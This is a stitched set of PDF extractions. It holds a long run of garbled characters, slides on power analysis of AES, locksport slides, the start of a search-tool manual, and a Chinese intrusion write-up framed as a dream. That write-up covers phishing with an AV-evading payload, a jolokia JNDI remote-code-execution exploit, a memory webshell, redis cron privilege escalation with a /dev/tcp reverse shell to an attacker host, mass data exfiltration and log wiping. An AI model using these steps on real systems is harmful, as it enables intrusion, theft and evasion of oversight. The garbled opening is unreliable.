k
l
m
N
n
h
a
¡
¢
n
O
P
e
S
S
T
j
W
R
`
Q
Y
S
V
^
Y
¦
®
x
Y
_
Y
Z
V
W
d
e
`
e
Z
S
«
$
$
p
S
S
Y
^
j
W
R
X
T
_
Y
u
V
`
V
X
T
_
s
O
x
d
v
Y
Q
T
U
W
Y
S
N
|
h
¢
N
|
ª
¦
h
ª
®
0
¸
<
q
e
`
R
Y
`
T
_
v
Y
S
`
T
{
V
`
Y
c
O
®
L
I
³
L
J
L
±
L
²
R
L
H
I
:
q
e
`
R
Y
`
T
_
v
Y
S
`
T
{
V
`
Y
c
O
H
²
¸
²
´
¯
q
e
`
R
Y
`
T
_
v
Y
S
`
T
{
V
`
Y
c
O
S
D
¼
D
Ã
D
B
D
D
E
l
p
§
N
|
w
¡
l
p
§
N
|
w
¡
1
o
W
V
S
S
~
u
V
`
V
o
e
^
^
]
_
T
U
V
`
T
e
_
S
q
Y
`
r
e
Z
s
k
_
`
Y
Z
t
V
U
Y
l
p
§
N
ª
h
l
p
§
N
ª
h
1
u
T
V
{
_
e
S
`
T
U
o
e
_
_
Y
U
`
e
Z
l
p
§
N
y
|
l
p
§
N
y
|
1
m
~
u
k
k
l
U
V
_
¤
e
e
W
l
p
§
N
y
l
p
§
N
y
1
§
©
§
u
T
V
{
_
e
S
`
T
U
¤
Y
S
`
d
e
c
Y
S
l
p
§
h
¡
N
h
l
p
§
h
¡
N
h
1
[
Y
U
e
^
^
Y
_
c
Y
c
P
Z
V
U
`
T
U
Y
t
e
Z
u
T
V
{
_
e
S
`
T
U
¤
Z
e
]
j
W
Y
o
e
c
Y
u
Y
£
_
T
`
T
e
_
S
l
p
§
h
N
y
|
¢
N
l
p
§
h
N
y
|
¢
N
1
o
W
V
S
S
~
u
V
`
V
o
e
^
^
]
_
T
U
V
`
T
e
_
q
Y
`
r
e
Z
s
d
Y
S
S
V
{
Y
S
1
u
Y
`
V
T
W
Y
c
z
Y
V
c
Y
Z
¥
e
Z
^
V
`
S
V
_
c
P
Q
R
S
T
U
V
W
p
c
c
Z
Y
S
S
p
S
S
T
{
_
^
Y
_
`
S
l
p
§
h
N
y
|
¢
h
l
p
§
h
N
y
|
¢
h
1
o
W
V
S
S
~
u
V
`
V
o
e
^
^
]
_
T
U
V
`
T
e
_
q
Y
`
r
e
Z
s
d
Y
S
S
V
{
Y
S
1
u
V
`
V
P
V
Z
V
^
Y
`
Y
Z
u
Y
£
_
T
`
T
e
_
S
l
p
§
h
N
y
|
¢
a
l
p
§
h
N
y
|
¢
a
1
o
W
V
S
S
~
u
V
`
V
o
e
^
^
]
_
T
U
V
`
T
e
_
q
Y
`
r
e
Z
s
d
Y
S
S
V
{
Y
S
1
¥
Z
V
^
Y
k
u
S
t
e
Z
l
T
_
{
W
Y
¢
~
R
`
Y
¥
e
Z
^
S
e
t
z
Y
V
c
Y
Z
S
l
p
§
h
N
y
|
¢
n
l
p
§
h
N
y
|
¢
n
1
o
W
V
S
S
~
u
V
`
V
o
e
^
^
]
_
T
U
V
`
T
e
_
q
Y
`
r
e
Z
s
d
Y
S
S
V
{
Y
S
1
d
Y
S
S
V
{
Y
u
Y
£
_
T
`
T
e
_
S
t
e
Z
¤
Q
Z
Y
Y
~
R
`
Y
z
Y
V
c
Y
Z
S
l
p
§
h
N
|
ª
l
p
§
h
N
|
ª
1
§
©
§
u
V
`
V
X
T
_
s
l
Y
U
]
Z
T
`
R
l
p
§
h
N
¡
l
p
§
h
N
¡
1
§
_
Q
V
_
U
Y
c
§
©
§
u
T
V
{
_
e
S
`
T
U
¤
Y
S
`
d
e
c
Y
S
l
p
§
h
h
|
n
l
p
§
h
h
|
n
1
z
T
{
Q
¢
l
}
Y
Y
c
o
p
q
f
z
l
o
g
t
e
Z
i
Y
Q
T
U
W
Y
p
}
}
W
T
U
V
`
T
e
_
S
V
`
w
¡
¡
~
P
l
k
l
m
N
n
N
¢
N
k
l
m
N
n
N
¢
N
1
[
e
V
c
i
Y
Q
T
U
W
Y
S
1
u
T
V
{
_
e
S
`
T
U
l
R
S
`
Y
^
S
1
[
Y
\
]
T
Z
Y
¢
^
Y
_
`
S
t
e
Z
T
_
`
Y
Z
U
Q
V
_
{
Y
e
t
c
T
{
T
`
V
W
T
_
t
e
Z
^
V
`
T
e
_
k
l
m
N
n
N
¢
h
k
l
m
N
n
N
¢
h
1
[
e
V
c
i
Y
Q
T
U
W
Y
S
1
u
T
V
{
_
e
S
`
T
U
l
R
S
`
Y
^
S
1
P
V
Z
`
h
o
p
[
~
Z
Y
\
]
T
Z
Y
^
Y
_
`
S
t
e
Z
T
_
`
Y
Z
U
Q
V
_
{
Y
e
t
c
T
{
T
`
V
W
k
l
m
N
n
N
¢
a
k
l
m
N
n
N
¢
a
1
[
e
V
c
i
Y
Q
T
U
W
Y
S
¢
u
T
V
{
_
e
S
`
T
U
l
R
S
`
Y
^
S
1
P
V
Z
`
a
i
Y
Z
T
¢
£
U
V
`
T
e
_
e
t
`
Q
Y
U
e
^
^
]
_
T
U
V
`
T
e
_
j
Y
`
r
Y
Y
_
v
Y
Q
T
U
W
Y
V
_
c
m
~
u
k
k
S
U
V
_
`
e
e
W
h
y
k
l
m
N
n
h
a
¡
¢
N
k
l
m
N
n
h
a
¡
¢
N
1
[
e
V
c
i
Y
Q
T
U
W
Y
S
1
u
T
V
{
_
e
S
`
T
U
l
R
S
`
Y
^
S
1
P
V
Z
`
N
P
Q
R
S
T
U
V
W
X
V
R
Y
Z
k
l
m
N
n
h
a
¡
¢
h
k
l
m
N
n
h
a
¡
¢
h
1
[
e
V
c
i
Y
Q
T
U
W
Y
S
1
u
T
V
{
_
e
S
`
T
U
l
R
S
`
Y
^
S
1
P
V
Z
`
h
u
V
`
V
X
T
_
s
X
V
R
Y
Z
k
l
m
N
n
h
a
¡
¢
a
k
l
m
N
n
h
a
¡
¢
a
1
[
e
V
c
i
Y
Q
T
U
W
Y
S
1
u
T
V
{
_
e
S
`
T
U
l
R
S
`
Y
^
S
1
P
V
Z
`
a
p
}
}
W
T
U
V
`
T
e
_
X
V
R
Y
Z
k
l
m
N
n
h
a
¡
¢
n
k
l
m
N
n
h
a
¡
¢
n
1
[
e
V
c
i
Y
Q
T
U
W
Y
S
1
u
T
V
{
_
e
S
`
T
U
l
R
S
`
Y
^
S
1
P
V
Z
`
n
[
Y
\
]
T
Z
Y
^
Y
_
`
S
t
e
Z
Y
^
T
S
S
T
e
_
¢
Z
Y
W
V
`
Y
c
S
R
S
`
Y
^
S
¤
k
p
¢
h
a
h
¤
k
p
¢
h
a
h
1
k
_
`
Y
Z
t
V
U
Y
~
Y
`
r
Y
Y
_
u
V
`
V
¤
Y
Z
^
T
_
V
W
§
\
]
T
}
^
Y
_
`
V
_
c
u
V
`
V
o
T
Z
U
]
T
`
¢
¤
Y
Z
^
T
_
V
`
T
_
{
§
\
]
T
}
^
Y
_
`
§
^
}
W
e
R
T
_
{
l
Y
Z
T
V
W
~
T
_
V
Z
R
u
V
`
V
k
_
`
Y
Z
U
Q
V
_
{
Y
k
§
§
§
N
h
|
n
k
§
§
§
N
h
|
n
1
l
`
V
_
c
V
Z
c
l
T
{
_
V
W
T
_
{
d
Y
`
Q
e
c
t
e
Z
V
~
T
c
T
Z
Y
U
`
T
e
_
V
W
P
V
Z
¢
V
W
W
Y
W
P
Y
Z
T
}
Q
Y
Z
V
W
k
_
`
Y
Z
t
V
U
Y
t
e
Z
P
Y
Z
S
e
_
V
W
o
e
^
}
]
`
Y
Z
S
n
o
¥
[
w
ª
w
·
_
T
`
Y
c
l
`
V
`
Y
S
o
e
c
Y
e
t
¥
Y
c
Y
Z
V
W
[
Y
{
]
W
V
`
T
e
_
S
È
¤
T
`
W
Y
n
È
i
e
W
]
^
Y
w
È
P
V
Z
`
w
ª
w
1
i
Y
Q
T
U
W
Y
k
c
Y
_
`
T
£
U
V
`
T
e
_
q
]
^
j
Y
Z
[
Y
\
]
T
Z
Y
^
Y
_
`
S
k
l
m
a
y
y
k
l
m
a
y
y
1
[
e
V
c
i
Y
Q
T
U
W
Y
S
1
i
Y
Q
T
U
W
Y
T
c
Y
_
`
T
£
U
V
`
T
e
_
_
]
^
j
Y
Z
f
i
k
q
g
1
o
e
_
`
Y
_
`
V
_
c
S
`
Z
]
U
`
]
Z
Y
k
l
m
a
y
|
¡
k
l
m
a
y
|
¡
1
[
e
V
c
v
Y
Q
T
U
W
Y
S
1
b
e
Z
W
c
^
V
_
]
t
V
U
`
]
Z
Y
Z
T
c
Y
_
`
T
£
Y
Z
f
b
d
k
g
U
e
c
Y
h
| | pdf |
Correlation Power Analysis
of AES-256 on ATmega328P
1
游世群 JPChen 許遠哲
Outlines
• SCA/DPA/CPA
• Hardware Implementation
• Demo Video
• CPA Implementation on AES Rounds
• Countermeasures
• Conclusion
2
Side-Channel Analysis
• There is a key hidden in an encryption algorithm.
• We need a hardware to implement this system.
• This hardware may leak information about the key.
• By analyzing the leakages, we can rebuild the key.
(figure: Plaintext → Encryption Algorithm [Hardware, key] → Ciphertext)
3
Differential Power Analysis (DPA)
Compare two power traces from two different encryptions:
• By analyzing the difference between traces from different encryptions.
• Use statistical tools to recover the key.
4
• AES is a block cipher.
• 1 byte as a unit.
• Plaintexts, Round Keys,
Ciphertexts and Intermediate
values can be regarded as
16 independent bytes.
Divide and Conquer
12 43 F5 68
77 26 54 87
A3 B3 7E FF
9B 4A AF E8
A Block of AES
Search Space: reduced from 2^128 to 16 × 2^8
5
Power Consumption in Register
0x00
0 0 0 0 0 0 0 0
0xc3
1 1 0 0 0 0 1 1
4 bits change
A register.
Assume that each bit change costs the same value b;
the overall power consumption y will be:
y = a + HD(0x00, 0xc3)·b + N
Hamming Distance of these 2 hex-numbers
6
0x00
0 0 0 0 0 0 0 0
Power Consumption in Register
0x6d
0 1 1 0 1 1 0 1
0xc3
1 1 0 0 0 0 1 1
0 1 1 0 1 1 0 1
1 1 0 0 0 0 1 1
• Hamming Distance model:
y = a + HD(0x6d, 0xc3)·b + N
0xc3
1 1 0 0 0 0 1 1
• Hamming Weight model:
y = a + HW(0xc3)·b + N
7
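These two models are trivial to compute; as a quick illustrative check in Python (not from the original deck), the Hamming weight is the pop-count of a value and the Hamming distance is the Hamming weight of the XOR:

def hamming_weight(x):
    # number of 1 bits in x
    return bin(x).count("1")

def hamming_distance(a, b):
    # bits that flip when a register goes from value a to value b
    return hamming_weight(a ^ b)

assert hamming_weight(0xC3) == 4
assert hamming_distance(0x6D, 0xC3) == 5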
Leakages from AES
T0: y0 = a + H( f5(p0,k) )·b + N
T1: y1 = a + H( f5(p1,k) )·b + N
T2: y2 = a + H( f5(p2,k) )·b + N
⋮︙
Tn: yn = a + H( f5(pn,k) )·b + N
y = a + HD(0x00, 0xc3)·b + N
8
Leakages from AES
T0: y0 = a + H( f5(p0,k) )·b + N
T1: y1 = a + H( f5(p1,k) )·b + N
T2: y2 = a + H( f5(p2,k) )·b + N
⋮︙
Tn: yn = a + H( f5(pn,k) )·b + N
k: key
pi : known plaintext
fi : the i-th Intermediate
value function
H: Hamming Distance
or Hamming Weight
9
Correlation Power Analysis
T0: y0 = a + H( f5(p0,k) )·b + N
T1: y1 = a + H( f5(p1,k) )·b + N
T2: y2 = a + H( f5(p2,k) )·b + N
⋮︙
Tn: yn = a + H( f5(pn,k) )·b + N
If our key guessing is right,
Cor(y, x) will be significant.
If it is wrong,
Cor(y, x) will be close to 0.
Pearson Correlation Coefficient:
10
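As an illustrative sketch with assumed names (not the workshop's own code): with traces as an n_traces × n_samples NumPy array, pts as the corresponding plaintext bytes for one byte position, and SBOX as the AES S-box table, recovering one key byte is a loop over the 256 guesses, keeping the guess whose Hamming-weight hypothesis correlates best with the measured power:

import numpy as np

HW = np.array([bin(x).count("1") for x in range(256)])

def cpa_key_byte(traces, pts, SBOX):
    best_k, best_r = 0, 0.0
    tc = traces - traces.mean(axis=0)
    for k in range(256):
        # hypothetical leakage: HW of the first-round S-box output
        x = HW[SBOX[pts ^ k]].astype(float)
        xc = x - x.mean()
        # Pearson correlation of the hypothesis against every sample point
        r = (xc @ tc) / (np.linalg.norm(xc) * np.linalg.norm(tc, axis=0))
        peak = np.max(np.abs(r))
        if peak > best_r:
            best_k, best_r = k, peak
    return best_k, best_r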
Outlines
• SCA/DPA/CPA
• Hardware Implementation
• Demo Video
• CPA Implementation on AES Rounds
• Countermeasures
• Conclusion
11
ATMega328P
https://www.arduino.cc/en/Main/ArduinoBoardUno
12
ChipWhisperer
ChipWhisperer board
1. control FPGA
2. OpenADC
MultiTarget board
1. micro controller
2. card socket
3. FPGA
13
Hardware Implementation
14
Outlines
• SCA/DPA/CPA
• Hardware Implementation
• Demo Video
• CPA Implementation on AES Rounds
• Countermeasures
• Conclusion
15
Demo Video
16
3a cd 58 34 26 59 74 95 17 98 8a 73 44 77 52 54 73 45 f7 ee ec bb ae 67 98 87 07 45 00 37 42 66
Demo Video
17
3a cd 58 34 26 59 74 95 17 98 8a 73 44 77 52 54 73 45 f7 ee ec bb ae 67 98 87 07 45 00 37 42 66
Outlines
• SCA/DPA/CPA
• Hardware Implementation
• Demo Video
• CPA Implementation on AES Rounds
• Countermeasures
• Conclusion
18
CPA on One Round of AES Encryption
12 43 F5 68
77 26 54 87
A3 B3 7E FF
9B 4A AF E8
Known Input
00
01
02
03
FF
⋮
Key Guess
12
00
Choose a byte
Choose a key guessing
19
5A 0C 6C FC
67 BE AF 60
42 FF C3 51
6E 23 0A A9
12
96
CPA on One Round of AES Encryption
⨁
00
45
⋮
5A
5A
Input N
20
6E
BE
C9
90
CPA on One Round of AES Encryption
12
96
45
5A
substitution box
⋮
S-box
compute their Hamming Weight
4
2
5
6
⋮
intermediate values X
⋮
power leakages Y
Compute their correlation coefficient of every point
• If there are any points with a significant Correlation
Coefficient value, the guessed key might be correct.
11001001
21
⋮
CPA on One Round of AES Encryption
12 43 F5 68
77 26 54 87
A3 B3 7E FF
9B 4A AF E8
Known Input
00
01
02
03
FF
⋮
Key Guess
01
Repeat 16 times, once for each byte!
00
02
7B
FF
Choose another key
We should try every key
There will be a guess
key with a significant
correlation coefficient
22
Compare AES-256 with AES-128
Similarities:
• Block size is 128 bits, and so is the Round Key size.
Differences:
• 256-bit Master Key.
• 14 rounds while 10 rounds in AES-128.
k0: the first half (128 bits) of master key.
k1: the second half (128 bits) of master key.
23
2b 28 ab 09 a0
88 23 2a
f2
7a 59 73 3d 47 1e 6d
7e ae
f7
cf
fa
54 a3 6c c2
96 35 59 80
16 23 7a
15 de 15
4f
fe
2c 39 76 95 b9 80
f6
47
fe
7e 88
16 a6
88 3c 17 b1 39 05
f2
43 7a
7f
7d 3e 44 3b
Key Schedule of AES-128
2b 28 ab 09 11
7a 44 4a
f6
de 75 7c 01 7b
3f
75
7e ae
f7
cf
02
93
8f
93 03 ad 5a 95 28 bb 34 a7
15 de 15
4f
4e
0c ee 13 51
83 96 d9 7b 77 99 8a
16 a6
88 3c
f6
be 27 86 c0
66 ee d2 43
fd
da 5c
Key Schedule of AES-256
First Round is enough
Needs 2 Rounds
2b 28 ab 09
7e ae
f7
cf
15 de 15
4f
16 a6
88 3c
2b 28 ab 09 11
7a 44 4a
7e ae
f7
cf
02
93
8f
93
15 de 15
4f
4e
0c ee 13
16 a6
88 3c
f6
be 27 86
24
Compare AES-256 with AES-128
45 67 2A C4
78 CF AE 7A
BE 87 69 93
FF 0B 00 2C
12 43 F5 68
77 26 54 87
A3 B3 7E FF
9B 4A AF E8
45 67 2A C4
78 CF AE 7A
BE 87 69 93
FF 0B 00 2C
Plaintexts
Compute the Intermediate Values
X
traces
Y
CPA
Attacks on AES-128
25
Compare AES-256 with AES-128
45 67 2A C4
78 CF AE 7A
BE 87 69 93
FF 0B 00 2C
12 43 F5 68
77 26 54 87
A3 B3 7E FF
9B 4A AF E8
This round key is the first-half key
Use it to compute the input of the next round
33 26 EE 64
32 CF AE 7A
6C 87 69 93
C3 0B 00 2C
22 43 C3 68
54 26 54 87
EA B3 7E FF
89 4A AF E8
76 28 9A 53
0C EF B3 4A
56 54 00 96
7E C0 EE 2C
X
traces
Y
1 Round Encryption Results
This round key is the second-half key
26
Resynchronization and Alignment
• The variables we concern change vertically.
• Those horizontal shifts could be disturbances.
27
Resynchronization and Alignment
• Use some special pattern to align.
Call this special signal h[n]
28
Resynchronization and Alignment
• Method 1: Sum of Absolute Difference (SAD).
• If two N-points signals are similar, SAD will be small.
• Align the traces by minimizing the SAD.
29
Resynchronization and Alignment
• Method 2: Correlation based method.
• If two N-points signals are similar, the correlation
coefficient will be near 1.
• Align the traces by maximizing the correlation
coefficient.
30
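Both criteria take only a few lines; a minimal sketch with assumed names (not the original tooling) slides the reference pattern h over each trace and keeps the offset that minimizes the SAD or maximizes the correlation coefficient:

import numpy as np

def align_offset(trace, h, method="sad"):
    n = len(h)
    scores = []
    for off in range(len(trace) - n + 1):
        w = trace[off:off + n]
        if method == "sad":
            scores.append(np.sum(np.abs(w - h)))    # smaller is better
        else:
            scores.append(np.corrcoef(w, h)[0, 1])  # closer to 1 is better
    scores = np.asarray(scores)
    return int(np.argmin(scores)) if method == "sad" else int(np.argmax(scores))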
Resynchronization and Alignment
Before resynchronization
After resynchronization
31
Outlines
• SCA/DPA/CPA
• Hardware Implementation
• Demo Video
• CPA Implementation on AES Rounds
• Countermeasures
• Conclusion
32
CHES 2016 CTF
http://www.chesworkshop.org/ches2016/start.php
CHES 2016 CTF
https://ctf.newae.com/flags/
Countermeasure (1)
• Shuffling:
For trace 1: related to byte 0
For trace 2: related to byte 0
(figure: with shuffling, the operation related to byte 0 lands at a different point in time in each trace)
35
36
Countermeasure (2)
• Adding Dummy:
(figure: both traces process byte 0, byte 1, byte 2, ... in order, but inserted dummy operations shift where each byte's processing appears in Trace 1 versus Trace 2)
37
38
Outlines
• SCA/DPA/CPA
• Hardware Implementation
• Demo Video
• CPA Implementation on AES Rounds
• Countermeasures
• Conclusion
39
Conclusion
• With more statistical techniques applied, SCA is more
powerful than ever.
40
• Encryption systems could be insecure without any
protections from SCA.
• SCA protections should be taken into account when
using microcontrollers like ATmega328P and their
applications in IoT.
Reference
• S. Mangard et al. Power Analysis Attacks.
• Colin O'Flynn ChipWhisperer.
http://www.newae.com/sidechannel/cwdocs/
• CHES CTF 2016
https://ctf.newae.com
• Papers from CHES, Eurocrypt, Crypto and Asiacrypt
• Arduino
https://www.arduino.cc
• Atmel
http://www.atmel.com
41 | pdf |
0x00 Intro
Friends interested in technical exchange, or in penetration testing / code audit / red-team training / red-vs-blue assessment services, are welcome to reach out via QQ/VX-547006660
A couple of days ago a friend at a state-owned enterprise ran into a tough target; word was nobody had ever gotten in from the outside, and the only recourse had been Great-Firewall-style evidence collection
That piqued my interest, so I conjured up a practice range in a dream and pentested it, and that dream has been duly authorized
Dear readers, please do not read any real organization into this; any resemblance is purely coincidental
0x01 Phishing for a Foothold
The official site listed a customer-service contact
Cobalt Strike with its shellcode signatures modified, plus an AV-evading loader, produced a fully undetected payload
The extension was renamed to something other than exe (if you know, you know), and the customer-service rep was phished with a bit of pretexting (reps are savvier these days; a bare exe will never land), yielding the notes file from their desktop
The notes file turned up the admin-panel address, but no credentials (which would have been useless anyway, since a Google authenticator code is required)
http://xxxxx/xxxxx-admin/
0x02 Fuzzing Turns Up a Spring Actuator Leak; Analyzing the Information
A quick fuzz exposed a Spring Actuator leak under a second-level directory
http://xxxxx/xxxxx-admin/actuator/
And there was our old friend jolokia
Anyone who has tested Spring knows the jolokia component; barring surprises it is usually an instant win
I also visited a few of the usual endpoints
http://xxxxx/xxxxx-admin/actuator/env
The env endpoint showed the backend is hosted on Amazon's cloud, and no AK/SK or similar secrets were leaked
Digging through it, the only item of interest was a redis password
A look at the beans endpoint found no suitable MBean for dumping the starred-out passwords directly, so I gave up on recovering plaintext via jolokia MBean calls
http://xxxxx/xxxxx-admin/actuator/heapdump
I downloaded the heapdump and loaded it into MAT for analysis
select * from java.util.Hashtable$Entry x WHERE (toString(x.key).contains("password"))
Debugging showed the configured redis address was 127.0.0.1 with an empty password, but the port was not exposed externally, so that lead had to wait
0x03 Jolokia Realm JNDI Injection RCE
https://xxxx/xxxxx-admin/actuator/jolokia/
Given the jolokia endpoint
I went straight for the RCE
The exploitation preconditions are:
the target's /jolokia/list response contains the keywords type=MBeanFactory and createJNDIRealm
the target can make outbound requests
Command encoder: http://www.jackson-t.ca/runtime-exec-payloads.html
Encode the reverse-shell command
Use JNDI-Injection-Exploit to stand up a malicious RMI service
java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "command" -A vps_ip
Then adapt the ready-made script
https://raw.githubusercontent.com/LandGrey/SpringBootVulExploit/master/codebase/springboot-realm-jndi-rce.py
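For reference, that script drives the jolokia endpoint through a short sequence of JSON POSTs; the sketch below mirrors its flow (the realm MBean path and attribute names follow the public PoC, while the base URL and the rmi:// address are placeholders to fill in):

import requests

base = "http://xxxxx/xxxxx-admin/actuator/jolokia"
steps = [
    # create a JNDIRealm under the Catalina engine
    {"type": "EXEC", "mbean": "Catalina:type=MBeanFactory",
     "operation": "createJNDIRealm", "arguments": ["Catalina:type=Engine"]},
    # point the realm's JNDI lookup at the rogue RMI registry
    {"type": "WRITE", "mbean": "Catalina:realmPath=/realm0,type=Realm",
     "attribute": "contextFactory",
     "value": "com.sun.jndi.rmi.registry.RegistryContextFactory"},
    {"type": "WRITE", "mbean": "Catalina:realmPath=/realm0,type=Realm",
     "attribute": "connectionURL", "value": "rmi://vps_ip:1099/Object"},
    # stop and restart the realm so it performs the JNDI lookup
    {"type": "EXEC", "mbean": "Catalina:realmPath=/realm0,type=Realm",
     "operation": "stop", "arguments": []},
    {"type": "EXEC", "mbean": "Catalina:realmPath=/realm0,type=Realm",
     "operation": "start", "arguments": []},
]
for body in steps:
    print(requests.post(base, json=body, timeout=10).status_code)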
Luck was on my side: the target had outbound access, instant win
www privileges
0x04 Post-Shell Forensics
The routine evidence collection (history, last, hosts, middleware logs and so on) needs no elaboration
The target's ops staff were fairly careful: no direct connections, with SSH going through an Amazon-cloud host used as a jump box
A look at the process list showed the web application is built on an MVC framework
0x05 Injecting a Memory Shell
To keep the reverse shell from dying at any moment, I chose to inject an in-memory webshell into Tomcat
The annoying part is that with the target's MVC framework the routes all 302-redirect to the admin panel by default, which breaks quite a few memory-shell implants; pressed for time, I dug one up on GitHub
https://github.com/WisteriaTiger/JundeadShell
and went all-in on the compromised host
With Burp attached I probed the target, found an endpoint that does not 302-redirect, added the password, and the memory shell answered
0x06 Privilege Escalation via redis
We only had www privileges, the host ran on Amazon's cloud and was promptly patched; recent entries like pkexec and Dirty Pipe did not work, and antiques like Dirty COW were hopeless
A pass over GUID/SUID binaries turned up no misconfigurations
Just as I was about to give up, one more look at the process list: redis was running as root... heaven-sent
wget x.x.x.x:50000/agent_starter.jar
nohup java -jar agent_starter.jar "java_process_name" 8 &
I used a port-forwarding agent to expose the redis port to my own machine
and abused redis to write a cron job
(PS: on Ubuntu the binary junk mixed into the dump makes cron reject the file's syntax, so the job never fires; CentOS is unaffected and the technique works, and this target ran CentOS)
With nc listening locally, a root shell came back within a minute
echo -e "\n\n*/1 * * * * /bin/bash -i >& /dev/tcp/xx.xx.xx.xx/4444 0>&1\n\n"|redis-cli -h xx.xx.xx.xx -x set 1 # set the value
redis-cli -h xx.xx.xx.xx config set dir /var/spool/cron/
redis-cli -h xx.xx.xx.xx config set dbfilename root
redis-cli -h xx.xx.xx.xx save
I then exfiltrated the shadow file, collected parts of root's home directory as evidence, and set up some persistence
0x07 Exfiltrating the Forensic Material
With the site's jar packages, directory logs and login logs bundled up, several gigabytes in all, getting the files out became the hard part
tar -cvf xxxx.tar *
nc and backdoor transfers kept dropping mid-upload, and my own OSS bucket had expired by then, so that route was out too; thoroughly painful..
In the end a master in my small circle offered a handy idea:
exfiltrate the files via CowTransfer (奶牛快传)
https://github.com/Mikubill/cowtransfer-uploader
nohup ./cowtransfer-uploader -c "remember-mev2=...;" -a "<cow-auth-token>" xxx.tar
The speed was very comfortable, roughly 6 MB per second up
Afterwards, just download everything from your own CowTransfer account
0x08 Analyzing the Material
Decompile the exfiltrated jars, extract the database connection details as evidence, and await further instructions
The application's own logs lay the admin-panel logins, accounts and source IPs bare; the criminals lurking in the dark do not have long left
0x09 Covering Tracks and Closing Words
Afterwards the day's web logs, history, and everything under /var/log were scrubbed clean
Every tool used was wiped from disk
The instant the shell connection dropped, I woke up and realized it had all been a dream
Locksport
An Emerging Subculture
Intro and History
• Locks
• Lockpickers
Locks
• Egyptian Pin Tumbler
• Medieval Artistry
• Puzzle Locks
• Modern Advances
– Pin Tumbler Sidebar
– Wafer Lock
– Disc Lock
– Lever Lock
Lockpickers
• Pre-locks (the thief knot)
• Wax pad attack
• Similarity of keys
• Bramah Vs. Hobbs
– Great Exhibition
– Unsupervised?
– Still controversy
– Media Coverage
Modern Lockpicking
• TOOOL NL
• SSDEV (Germany)
• The Dutch and German competitions
• “Coming to America” (TOOOL US & LI)
• DEFCON / HOPE
The Open Organisation Of Lockpickers
• Originated from the NVHS (Dutch Association for Door
Hardware Sport )
• Currently have several chapters and ~100 members.
• Struggles with manufacturers
• Developed relationships with many Lock firms:
– Wink Haus
– Assa Abloy
– Geminy
– RKS
• Han Fey, lock collector
• Dutch Open
SSDEV
• Steffan Wernery in 1997
• First major established organization
• Set out to provide a firm ethical foundation for
the sport
• Host competition in Berlin
• Recently made the English language transition
• Top pickers in the world
• Over 1000 current members in ~ 10 chapters
• Proposed a lockpicking olympics
The German/Dutch Opens
• 1997 in Hamburg, DE
• 23 attempted in 1997
• 2002 in Sneek, NL
• 50 attempted in 2006
• Prizes
• 2007 dates
Coming To America!
• TOOOL establishes first US chapter in 2002
• Josh Nekrep, Kim Bohnet, and Devon McDormand form
Locksport International in 2005
• Eric Michaud, Babak Javadi, Eric Schmeidl, and
Schuyler Towne form TOOOL US in 2006
• TOOOL current membership
• LI current membership
• To merge or not to merge
• Differences
• Press
DEFCON / HOPE
• Con within a Con
• LP Village
• Other conferences that feature locksport
• Developed from this community
• Will always have common ties
The Internet
• Forums
• YouTube
• Blogs
Forums
• Lockpicking101.com
– Black Hat
– LI develops
– Constant ethical debate
– Division of material
• EZPicking.com
– Anti-LP101
– No division of material
– Limited talent
• Bump Key Specific Forums
– Limited info
– Hopefully becoming obsolete
YouTube
• Lockpicking is a visual sport
• YouTube can be a convenient teaching tool
• Allows one ignorant person to propagate that ignorance
• Lot of people don’t know how their lock has opened
• Sketchy people out there…
• Giving us a bad name
• Example 1
• Example 2
Blogs
• Marc Weber Tobias
– Security.org
– LSS+
• Barry Wels
– Blackbag
– Secondary interests
• Other blogs
– Locks and security
– Discreet Security Solutions
Why Locksport Matters
• (in)Security through obscurity
• Media representation
• Lock design
(in)Security through obscurity
• Unique locks were the standard
• Inconsistent quality
• Mass production led to standardization
• Standardization = consistent attack vectors
• Manufacturers still insist on secrecy over
security
The Media
• Double Edged Sword
• Talented locksmiths are revered…
• Talented lockpickers are a reason for worry
• Wired Magazine at the Dutch Open
• Wall Street Journal
• Local news scare tactics
• The bumping phenomenon
• Competition bodes well for us
Lock Design
• Positive relationships with European groups
• Weiser / Kwikset smartkey & Master’s new pins
• The American bypass & “solution”
• SFIC sleeve improvements
• A staggering number of recent advancements
• Obvious influence
• Developing stateside relationships
Last Word
• Why we do it
– Professionals keeping up
– Related fields
– Puzzles
– Security evangelists
– Young field
– Constant challenges
– The hobbyist ideal
Thank you!
Schuyler Towne
[email protected]
NDE Magazine
TOOOL US | pdf |
Athena
A user’s guide
By Steve Lord
(A friend of Dave’s)
[email protected]
”You are no longer a child: you must put childish thoughts away."
[Athena to Telemachus. Homer, Odyssey 1.296]
Background
Athena was the Greek goddess of wisdom, war, the arts, industry,
justice and skill. She was the strongest supporter of Odysseus, and
regularly helped both him and his son Telemachus throughout the
Odyssey. Athena is also the name of a mighty fine Turkish band, but
that’s not important right now.
I’d been working on a poorly written search engine query tool for a
while when I heard about Foundstone’s SiteDigger. I decided to
expand it into something better, using a modified (yet semi-
compatible) form of the SiteDigger XML file format.
Requirements
Athena should work on any system with the .NET CLR runtime
installed. So far it’s been tested on various Windows XP systems with
.NET but 2000 should be fine. If anyone gets this working on Mono
then I’d be very interested in hearing about it.
Further Information
The latest release of Athena is available from the Athena homepage at
http://www.buyukada.co.uk/projects/athena/ - There is also an
Athena mailing list accessible from the main Athena site.
Credit Where Credit’s Due
Athena couldn’t have been written without the help of a number of
people. Firstly, the guys at Foundstone who’s excellent SiteDigger
almost met my requirements and motivated me to write Athena,
jonny.ihackstuff.com for the inspiration, same goes for the Fravia guys
at searchlore.org. Thanks also go to Muad’dib and Jamaica Dave for
being great beta testers and of course to my wife Ozge, who’s put up
with my blobbing as I completely fail to juggle this, home and work.
Polite Notice
Athena could be misused to do some really bad things. Please don’t.
Every time you exploit something through Athena, you give me less of
an incentive to publicly release updates. If I get enough complaints
from search engine owners, I’ll take it offline.
Getting Started
Installing Athena is easy, just double-click on the installer and follow
the on-screen instructions. Once it’s installed, go to Start-Programs-
Athena-Athena or double-click the Athena Icon on your desktop. You
should get something like the picture below:
Figure 1: Athena’s startup screen
The screen layout
The screen is divided into 3 areas (shown in Figure 1): The menu(1),
query management(2) and the browser view(3). The menu allows you
to load xml configuration files, specify output files, exit and see an
about page.
The browser window is effectively an embedded Internet Explorer
instance, managed by the values in the query management area.
The query management area is where everything happens. The action
buttons (Search, Stop, Reload, Back, Forward and Exit) are fairly self-
explanatory. You can select which search engine supported by your
configuration file you want to use by using the Selected Search Engine
drop-down box. The Query Description Text box provides a description
of the refined query selection in the Query Selection box. Whenever a
change is made that will affect a URL to be submitted, the Current URL
